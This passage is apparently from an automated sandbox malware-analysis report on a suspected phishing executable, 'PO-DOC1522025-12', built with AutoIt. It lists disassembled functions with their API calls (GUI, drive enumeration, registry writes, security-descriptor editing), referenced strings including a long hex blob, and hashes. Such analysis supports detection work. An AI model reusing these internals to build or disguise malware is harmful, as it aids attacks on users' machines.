                                                                                    • Instruction Fuzzy Hash: 2BA1947210A312FFDB009F60DC48A5BB7A9FB49321F100F1AF962961E1D771E944CB91
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000), ref: 001C273E
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001C286A
                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001C28A9
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001C28B9
                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 001C2900
                                                                                    • GetClientRect.USER32(00000000,?), ref: 001C290C
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001C2955
                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001C2964
                                                                                    • GetStockObject.GDI32(00000011), ref: 001C2974
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 001C2978
                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001C2988
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001C2991
                                                                                    • DeleteDC.GDI32(00000000), ref: 001C299A
                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001C29C6
                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 001C29DD
                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 001C2A1D
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001C2A31
                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 001C2A42
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001C2A77
                                                                                    • GetStockObject.GDI32(00000011), ref: 001C2A82
                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001C2A8D
                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001C2A97
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                    • API String ID: 2910397461-517079104
                                                                                    • Opcode ID: 41e491f1f23630f45ea3f38a4fce2cce568c25db581805a047b51d25abf2ea41
                                                                                    • Instruction ID: 6b40c7f923c8513d05b0b77fdbd53e3d421a92608f4f94f4dc54e451b65dec1c
                                                                                    • Opcode Fuzzy Hash: 41e491f1f23630f45ea3f38a4fce2cce568c25db581805a047b51d25abf2ea41
                                                                                    • Instruction Fuzzy Hash: 61B16071A01215AFDB14DF68DC89FAEBBA9EF14710F008559FA14EB2A0DB70ED40CB90
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 001B4AED
                                                                                    • GetDriveTypeW.KERNEL32(?,001DCB68,?,\\.\,001DCC08), ref: 001B4BCA
                                                                                    • SetErrorMode.KERNEL32(00000000,001DCB68,?,\\.\,001DCC08), ref: 001B4D36
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveType
                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                    • API String ID: 2907320926-4222207086
                                                                                    • Opcode ID: 93d13f64189eaa71577357b68fbf97b5143730804a25c3d802d37205c340bbb4
                                                                                    • Instruction ID: 8f36e95d265733f882c9d82598a744b70a7ab5b0c9cf26ebc1a17f1aefc31118
                                                                                    • Opcode Fuzzy Hash: 93d13f64189eaa71577357b68fbf97b5143730804a25c3d802d37205c340bbb4
                                                                                    • Instruction Fuzzy Hash: 7561C330615206DBCB08EF64CA8A9FD7BB0EF15B00B24C416F806AB693DB31ED65DB41
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000012), ref: 001D7421
                                                                                    • SetTextColor.GDI32(?,?), ref: 001D7425
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 001D743B
                                                                                    • GetSysColor.USER32(0000000F), ref: 001D7446
                                                                                    • CreateSolidBrush.GDI32(?), ref: 001D744B
                                                                                    • GetSysColor.USER32(00000011), ref: 001D7463
                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 001D7471
                                                                                    • SelectObject.GDI32(?,00000000), ref: 001D7482
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 001D748B
                                                                                    • SelectObject.GDI32(?,?), ref: 001D7498
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 001D74B7
                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001D74CE
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 001D74DB
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001D752A
                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001D7554
                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 001D7572
                                                                                    • DrawFocusRect.USER32(?,?), ref: 001D757D
                                                                                    • GetSysColor.USER32(00000011), ref: 001D758E
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 001D7596
                                                                                    • DrawTextW.USER32(?,001D70F5,000000FF,?,00000000), ref: 001D75A8
                                                                                    • SelectObject.GDI32(?,?), ref: 001D75BF
                                                                                    • DeleteObject.GDI32(?), ref: 001D75CA
                                                                                    • SelectObject.GDI32(?,?), ref: 001D75D0
                                                                                    • DeleteObject.GDI32(?), ref: 001D75D5
                                                                                    • SetTextColor.GDI32(?,?), ref: 001D75DB
                                                                                    • SetBkColor.GDI32(?,?), ref: 001D75E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 1996641542-0
                                                                                    • Opcode ID: 9152e5c9ec36657d95a7b12bc693331d68a70fbb6138488e39605f4f877dab61
                                                                                    • Instruction ID: 81869771981bf9151ade3fe621ed14d87cfd55d82cc5476544baaa6953ef62eb
                                                                                    • Opcode Fuzzy Hash: 9152e5c9ec36657d95a7b12bc693331d68a70fbb6138488e39605f4f877dab61
                                                                                    • Instruction Fuzzy Hash: 1A615072902219EFDF019FA4DC49EEEBF79EB08320F114616F915AB2E1D7749980CB90
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 001D1128
                                                                                    • GetDesktopWindow.USER32 ref: 001D113D
                                                                                    • GetWindowRect.USER32(00000000), ref: 001D1144
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 001D1199
                                                                                    • DestroyWindow.USER32(?), ref: 001D11B9
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001D11ED
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001D120B
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001D121D
                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 001D1232
                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 001D1245
                                                                                    • IsWindowVisible.USER32(00000000), ref: 001D12A1
                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001D12BC
                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001D12D0
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001D12E8
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 001D130E
                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 001D1328
                                                                                    • CopyRect.USER32(?,?), ref: 001D133F
                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 001D13AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                    • String ID: ($0$tooltips_class32
                                                                                    • API String ID: 698492251-4156429822
                                                                                    • Opcode ID: 1e97c4f3ab642458f38a2368b89293f7a85467963939a08af89323d7f44fd81f
                                                                                    • Instruction ID: 68f16e45cac65653b4ca2b8b14b4896b52e81113ce647a93f8ffed85fa620009
                                                                                    • Opcode Fuzzy Hash: 1e97c4f3ab642458f38a2368b89293f7a85467963939a08af89323d7f44fd81f
                                                                                    • Instruction Fuzzy Hash: B9B16B71608341BFDB14DF64D884B6BBBE5FF98350F00891AF9999B2A1CB71E844CB91
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 001D02E5
                                                                                    • _wcslen.LIBCMT ref: 001D031F
                                                                                    • _wcslen.LIBCMT ref: 001D0389
                                                                                    • _wcslen.LIBCMT ref: 001D03F1
                                                                                    • _wcslen.LIBCMT ref: 001D0475
                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001D04C5
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001D0504
                                                                                      • Part of subcall function 0015F9F2: _wcslen.LIBCMT ref: 0015F9FD
                                                                                      • Part of subcall function 001A223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001A2258
                                                                                      • Part of subcall function 001A223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001A228A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                    • API String ID: 1103490817-719923060
                                                                                    • Opcode ID: 48860f35190414b9760058f6ea2d0f69d666a876ef397762bb64e166c86c723e
                                                                                    • Instruction ID: 1ad9732f1e381611df20db7101d2ce20edf08bfdda120bfabfde680e92f66b8d
                                                                                    • Opcode Fuzzy Hash: 48860f35190414b9760058f6ea2d0f69d666a876ef397762bb64e166c86c723e
                                                                                    • Instruction Fuzzy Hash: 71E1AF316183019FC715DF28C590A2AB3E6BF9C314F15495EF8969B3A2DB30ED45CB91
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00158968
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00158970
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0015899B
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 001589A3
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 001589C8
                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001589E5
                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001589F5
                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00158A28
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00158A3C
                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00158A5A
                                                                                    • GetStockObject.GDI32(00000011), ref: 00158A76
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00158A81
                                                                                      • Part of subcall function 0015912D: GetCursorPos.USER32(?), ref: 00159141
                                                                                      • Part of subcall function 0015912D: ScreenToClient.USER32(00000000,?), ref: 0015915E
                                                                                      • Part of subcall function 0015912D: GetAsyncKeyState.USER32(00000001), ref: 00159183
                                                                                      • Part of subcall function 0015912D: GetAsyncKeyState.USER32(00000002), ref: 0015919D
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,001590FC), ref: 00158AA8
                                                                                    Strings
                                                                                    • 406525561840652f5618406524561840652f561840652e561840652f561840652f561840652f561840652f56184065235618406523561840652c56184065295618, xrefs: 001967BA
                                                                                    • AutoIt v3 GUI, xrefs: 00158A20
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                    • String ID: 406525561840652f5618406524561840652f561840652e561840652f561840652f561840652f561840652f56184065235618406523561840652c56184065295618$AutoIt v3 GUI
                                                                                    • API String ID: 1458621304-3626949795
                                                                                    • Opcode ID: f24e544bb5b12a04e597e69c7488849bd7d099b01a96c747fa91980524b9a859
                                                                                    • Instruction ID: e49e1a5c7cf48571bb7a6d3c848cfac700362ed900580c1e0190e70899a7dbe7
                                                                                    • Opcode Fuzzy Hash: f24e544bb5b12a04e597e69c7488849bd7d099b01a96c747fa91980524b9a859
                                                                                    • Instruction Fuzzy Hash: 45B16C31A0120ADFDF14DFA8DC49BEA7BB5FB48315F11461AFA25AB290DB30A851CB51
                                                                                    APIs
                                                                                      • Part of subcall function 001A10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001A1114
                                                                                      • Part of subcall function 001A10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1120
                                                                                      • Part of subcall function 001A10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A112F
                                                                                      • Part of subcall function 001A10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001A0B9B,?,?,?), ref: 001A1136
                                                                                      • Part of subcall function 001A10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001A114D
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001A0DF5
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001A0E29
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001A0E40
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 001A0E7A
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001A0E96
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 001A0EAD
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001A0EB5
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 001A0EBC
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001A0EDD
                                                                                    • CopySid.ADVAPI32(00000000), ref: 001A0EE4
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001A0F13
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001A0F35
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001A0F47
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0F6E
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A0F75
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0F7E
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A0F85
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A0F8E
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A0F95
                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A0FA1
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A0FA8
                                                                                      • Part of subcall function 001A1193: GetProcessHeap.KERNEL32(00000008,001A0BB1,?,00000000,?,001A0BB1,?), ref: 001A11A1
                                                                                      • Part of subcall function 001A1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001A0BB1,?), ref: 001A11A8
                                                                                      • Part of subcall function 001A1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001A0BB1,?), ref: 001A11B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                    • String ID:
                                                                                    • API String ID: 4175595110-0
                                                                                    • Opcode ID: 4e23ed59ee41935c5299450197e0a53c34ecfb0a5e53925c70f76261c7bef697
                                                                                    • Instruction ID: a35b4354d1f988e0f65a25b07db7eefe89f66d8225e7ba28a22c3c5125e1938c
                                                                                    • Opcode Fuzzy Hash: 4e23ed59ee41935c5299450197e0a53c34ecfb0a5e53925c70f76261c7bef697
                                                                                    • Instruction Fuzzy Hash: F2716D7690121AEFDF219FA4DC44FAEBBB8BF09301F044516F919F6191D731A945CBA0
                                                                                    APIs
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001CC4BD
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,001DCC08,00000000,?,00000000,?,?), ref: 001CC544
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 001CC5A4
                                                                                    • _wcslen.LIBCMT ref: 001CC5F4
                                                                                    • _wcslen.LIBCMT ref: 001CC66F
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 001CC6B2
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 001CC7C1
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 001CC84D
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001CC881
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001CC88E
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 001CC960
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                    • API String ID: 9721498-966354055
                                                                                    • Opcode ID: acfc72c238be3a9c3b479ce740a1a3f1f25b0f9841f5190aeec45bc169926757
                                                                                    • Instruction ID: 84717f4f3d07245db59c44a7dd2da2215eff397ce42af090db74f39d8aa9de88
                                                                                    • Opcode Fuzzy Hash: acfc72c238be3a9c3b479ce740a1a3f1f25b0f9841f5190aeec45bc169926757
                                                                                    • Instruction Fuzzy Hash: AD1255756042119FDB14DF28C891F2AB7E5EF98714F05889DF88A9B3A2DB31ED41CB81
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 001D09C6
                                                                                    • _wcslen.LIBCMT ref: 001D0A01
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001D0A54
                                                                                    • _wcslen.LIBCMT ref: 001D0A8A
                                                                                    • _wcslen.LIBCMT ref: 001D0B06
                                                                                    • _wcslen.LIBCMT ref: 001D0B81
                                                                                      • Part of subcall function 0015F9F2: _wcslen.LIBCMT ref: 0015F9FD
                                                                                      • Part of subcall function 001A2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001A2BFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                    • API String ID: 1103490817-4258414348
                                                                                    • Opcode ID: b652f3fe417f09f484b25c9906d7951f962cba3f0b76a3061466460dd2eec9b4
                                                                                    • Instruction ID: f613344b22f84bbe827fb7213f0ab866ce8cd8c9cb5b817583b41635d6ab27ee
                                                                                    • Opcode Fuzzy Hash: b652f3fe417f09f484b25c9906d7951f962cba3f0b76a3061466460dd2eec9b4
                                                                                    • Instruction Fuzzy Hash: 91E1D1356087118FC715DF24C450A2AB7E2FFA8318F15895EF89A9B3A2D731ED45CB81
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                    • API String ID: 1256254125-909552448
                                                                                    • Opcode ID: ea6126b42ff92a778d90d226aba8ce6b7e9d849aaeb82f0ac723f0f18fe44f6f
                                                                                    • Instruction ID: cef471f96e38b848c485dfc7e59b594388e815fb111ae15e7194639a8cf588b9
                                                                                    • Opcode Fuzzy Hash: ea6126b42ff92a778d90d226aba8ce6b7e9d849aaeb82f0ac723f0f18fe44f6f
                                                                                    • Instruction Fuzzy Hash: 5B71D232A1052A8BCB20DEBC8941BBA3391ABB4794B15052CF86A9B295F731DD55C3E0
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 001D835A
                                                                                    • _wcslen.LIBCMT ref: 001D836E
